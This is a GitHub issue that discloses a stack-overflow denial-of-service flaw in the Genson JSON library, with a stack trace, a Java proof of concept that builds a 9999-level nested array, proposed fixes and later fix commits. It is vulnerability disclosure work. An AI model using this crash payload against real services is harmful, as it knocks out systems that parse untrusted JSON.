Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Stack overflow error caused by genson parsing of untrusted JSON String #191

Open
PoppingSnack opened this issue May 26, 2023 · 3 comments
Open

Stack overflow error caused by genson parsing of untrusted JSON String #191

PoppingSnack opened this issue May 26, 2023 · 3 comments

Comments

@PoppingSnack
Copy link

Stack overflow error caused by genson parsing of untrusted JSON String

Description

Using genson to parse untrusted JSON String may be vulnerable to denial of service (DOS) attacks. If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at com.owlike.genson.stream.JsonReader.begin(JsonReader.java:409)
	at com.owlike.genson.stream.JsonReader.beginArray(JsonReader.java:149)
	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:172)
	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
	at com.owlike.genson.Genson.deserialize(Genson.java:382)
	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.deserialize(DefaultConverters.java:997)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:176)
	at com.owlike.genson.convert.DefaultConverters$CollectionConverter.deserialize(DefaultConverters.java:159)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.deserialize(NullConverterFactory.java:77)
	at com.owlike.genson.Genson.deserialize(Genson.java:382)

PoC

        <dependency>
            <groupId>com.owlike</groupId>
            <artifactId>genson</artifactId>
            <version>1.6</version>
        </dependency>
import com.owlike.genson.Genson;

public class PoC {

    public final static int TOO_DEEP_NESTING = 9999;
    public final static String TOO_DEEP_DOC = _nestedDoc(TOO_DEEP_NESTING, "[ ", "] ", "0");


    public static String _nestedDoc(int nesting, String open, String close, String content) {
        StringBuilder sb = new StringBuilder(nesting * (open.length() + close.length()));
        for (int i = 0; i < nesting; ++i) {
            sb.append(open);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        sb.append("\n").append(content).append("\n");
        for (int i = 0; i < nesting; ++i) {
            sb.append(close);
            if ((i & 31) == 0) {
                sb.append("\n");
            }
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        String jsonString = TOO_DEEP_DOC;
        // 创建 Genson 实例
        Genson genson = new Genson();

        // 模糊测试 JSON 解析
        Object parsedObject = genson.deserialize(jsonString, Object.class);
    }
}

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing.((google/gson@2d01d6a20f39881c692977564c1ea591d9f39027))
@EugenCepoi
Copy link
Contributor

Hey! Thank you for the detailed issue and proposer solutions. I'm not maintaining Genson anymore. If you would like to propose a PR that would be more than welcome. I could then release it.
Thanks!

@pcgeng
Copy link

pcgeng commented Aug 28, 2023

@EugenCepoi So Genson is no longer be maintained?

@EugenCepoi
Copy link
Contributor

Hi @pcgeng , indeed, I decided to stop investing time in it, no new features or bug fixes from my side. But as I mention if folks want to contribute, it will then be maintained and I can invest some time in reviewing designs/code and doing releases.

guusdk added a commit to guusdk/genson that referenced this issue Jul 2, 2024
@guusdk
fixes owlike#191: Guard against stack overflow
05705a7 
This adds a quick and dirty guard against a stack overflow condition when deserializing severely nested data.
guusdk added a commit to guusdk/genson that referenced this issue Jul 2, 2024
@guusdk
fixes owlike#191 and owlike#192: Guard against stack overflow
629a587 
This adds a quick and dirty guard against a stack overflow condition when serializing and deserializing severely nested data.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@EugenCepoi @pcgeng @PoppingSnack